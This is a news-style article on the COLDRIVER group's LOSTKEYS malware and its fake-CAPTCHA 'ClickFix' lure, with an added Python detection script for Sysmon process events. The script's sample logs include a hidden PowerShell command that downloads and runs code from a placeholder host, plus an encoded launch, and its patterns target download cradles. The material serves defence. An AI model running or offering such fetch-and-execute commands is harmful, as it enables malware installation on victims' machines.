A deceptive CAPTCHA prompt—familiar to most as the routine “I am not a robot” verification—has been repurposed as a gateway for cyber espionage. Security researchers have uncovered a sophisticated malware campaign using this everyday interface to infiltrate high-value targets.
Dubbed LOSTKEYS, the malware is part of a broader operation attributed to COLDRIVER, a state-sponsored Russian hacking group known for its persistent targeting of Western diplomats, military advisors, NGOs, and more. The operation was recently analyzed by Google’s Threat Intelligence Group (GTIG), which confirmed ongoing attacks as recently as April 2025.
The attack begins when a target is lured to a counterfeit website, often through a spear-phishing email. There, instead of validating human identity, the fake CAPTCHA interface initiates a deceptive technique called ClickFix. Victims are instructed to paste a seemingly harmless command—copied automatically to their clipboard—into the Windows Run dialog. Doing so launches a PowerShell script that activates the LOSTKEYS malware.
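The ClickFix step leaves a recognisable trace in process telemetry: a script interpreter started by explorer.exe (the host of the Run dialog) with flags no one types by hand. Below is an added detection example, not code from the article or from GTIG; it assumes Sysmon process-creation events forwarded as JSON lines with ParentImage, Image and CommandLine fields, and the sample records, URL and base64 blob are constructed placeholders.

```python
import json
import re

# Interpreters a ClickFix lure typically asks the victim to paste into the Run dialog.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Command-line traits a person typing into Run would rarely use by hand.
TRAITS = {
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(?:iex|invoke-expression|irm|iwr|invoke-webrequest|downloadstring)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def clickfix_traits(event: dict) -> list[str]:
    """Traits matched by one process-create event; empty if the event is out of scope."""
    # The Run dialog is hosted by explorer.exe, so a pasted command shows up as a
    # script interpreter whose parent is explorer.exe; other parents are ignored.
    if (basename(event.get("ParentImage", "")) != "explorer.exe"
            or basename(event.get("Image", "")) not in INTERPRETERS):
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in TRAITS.items() if rx.search(cmd)]

def scan(log_lines: list[str], min_traits: int = 2) -> list[dict]:
    """Parse JSON-line events and return those matching at least min_traits traits."""
    alerts = []
    for line in log_lines:
        event = json.loads(line)
        traits = clickfix_traits(event)
        if len(traits) >= min_traits:
            alerts.append({"user": event.get("User"), "traits": traits,
                           "command": event.get("CommandLine")})
    return alerts

# Constructed sample telemetry (not real logs): a plain console launch, a pasted ClickFix-style
# command, a scheduled admin script, and a pasted encoded command. URL and base64 are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_LOG = [json.dumps(e) for e in [
    {"User": "CORP\\alice", "ParentImage": EXPLORER, "Image": PS, "CommandLine": "powershell.exe"},
    {"User": "CORP\\alice", "ParentImage": EXPLORER, "Image": PS, "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iex (irm https://captcha.example.invalid/verify)"'},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS, "CommandLine": r"powershell.exe -ep bypass -File C:\scripts\backup.ps1"},
    {"User": "CORP\\bob", "ParentImage": EXPLORER, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
]]
```

Only the two pasted launches are returned; the plain console and the scheduled script are not flagged, which keeps the rule usable alongside legitimate PowerShell use.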
Once deployed, the malware scours the host system, seeking out files by type and location. Its objectives are clear: harvest credentials, extract emails, and siphon contact lists. In certain instances where greater access is required, COLDRIVER has been seen installing additional malware to deepen surveillance or exfiltrate files directly from compromised devices.
GTIG traced some samples of the malware back to December 2023, concealed within files mimicking tools like Maltego, a popular platform for open-source intelligence gathering.
The targeting profile is sharply defined. Individuals connected to Western governments, especially those advising on security or foreign policy, are frequent victims. NGOs and media professionals with ties to Ukraine or NATO are also in COLDRIVER’s sights.
Google has responded by disabling malicious domains and alerting affected Gmail and Workspace users. However, the emergence of LOSTKEYS underscores a growing trend: leveraging common interfaces and trusted workflows to bypass technical defenses and exploit human trust.